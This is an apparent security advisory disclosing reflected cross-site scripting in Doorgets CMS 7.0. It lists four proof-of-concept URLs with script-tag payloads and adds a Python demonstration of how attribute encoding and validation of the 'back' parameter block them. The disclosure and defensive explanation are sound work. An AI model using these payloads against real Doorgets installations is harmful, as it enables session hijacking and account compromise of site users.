Doorgets CMS 7.0 was found to be vulnerable to reflected (non-persistent) cross-site scripting (XSS). The issue is caused by weak input validation, and successful exploitation may lead to user account compromise. An attacker can cause malicious payloads to execute in users' browsers, or trick users into clicking crafted links, which may allow their sessions to be hijacked.
Multiple instances of XSS were identified:
- http://localhost:8081/do/dg-user/?controller=authentification&error-login=true&back=/do/dg-user/%3Fcontroller%3Dinbox%26q_uri_module%3Dcontact"><script>alert('xss')</script>
- http://localhost:8081/do/dg-user/?action=forget"><script>alert('xss in action')</script>&controller=authentification
- http://localhost:8081/do/u/doorgets/?blog&apples"><Script>alert("XSS")</Script>pears
- http://localhost:8081/do/dg-user/?back="><script>prompt(966953)</script>&controller=authentification
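
An added example, not code from the advisory or from Doorgets: a Python stand-in showing why the `">` prefix in the URLs above breaks out of an HTML attribute, and how attribute-context output encoding plus validation of `back` neutralises it. The reflection sink (a form `action` attribute), the function names and the `/` fallback path are assumptions.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The four request URLs listed in the advisory, one per line.
ADVISORY_URLS = [u for u in """
http://localhost:8081/do/dg-user/?controller=authentification&error-login=true&back=/do/dg-user/%3Fcontroller%3Dinbox%26q_uri_module%3Dcontact"><script>alert('xss')</script>
http://localhost:8081/do/dg-user/?action=forget"><script>alert('xss in action')</script>&controller=authentification
http://localhost:8081/do/u/doorgets/?blog&apples"><Script>alert("XSS")</Script>pears
http://localhost:8081/do/dg-user/?back="><script>prompt(966953)</script>&controller=authentification
""".splitlines() if u]

# Assumption: a "back" target is a same-site path; "//host" and markup are rejected.
LOCAL_PATH = re.compile(r"/(?!/)[A-Za-z0-9/_.?=&%-]*")


def render_vulnerable(url):
    """Assumed sink: the decoded query string is echoed into an attribute as-is."""
    return '<form action="?' + unquote(urlsplit(url).query) + '">'


def render_hardened(url):
    """Same sink, but encoded for a double-quoted HTML attribute before output."""
    query = unquote(urlsplit(url).query)
    return '<form action="?' + html.escape(query, quote=True) + '">'


def safe_back(url, default="/"):
    """Validate the 'back' parameter on input; fall back to a fixed local path."""
    back = dict(parse_qsl(urlsplit(url).query)).get("back", default)
    return back if LOCAL_PATH.fullmatch(back) else default


def has_markup(fragment):
    """True when the rendered fragment contains an unescaped <script opener."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    # Columns: script survives raw echo, script survives encoding, validated 'back'.
    for url in ADVISORY_URLS:
        print(has_markup(render_vulnerable(url)), has_markup(render_hardened(url)),
              repr(safe_back(url)))
```

Encoding on output covers all four cases, including the ones where the markup rides in a parameter name rather than a value; the `back` allowlist is a second layer for that one parameter only.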
Vendor is aware and working on a fix.
Safe Surfing :)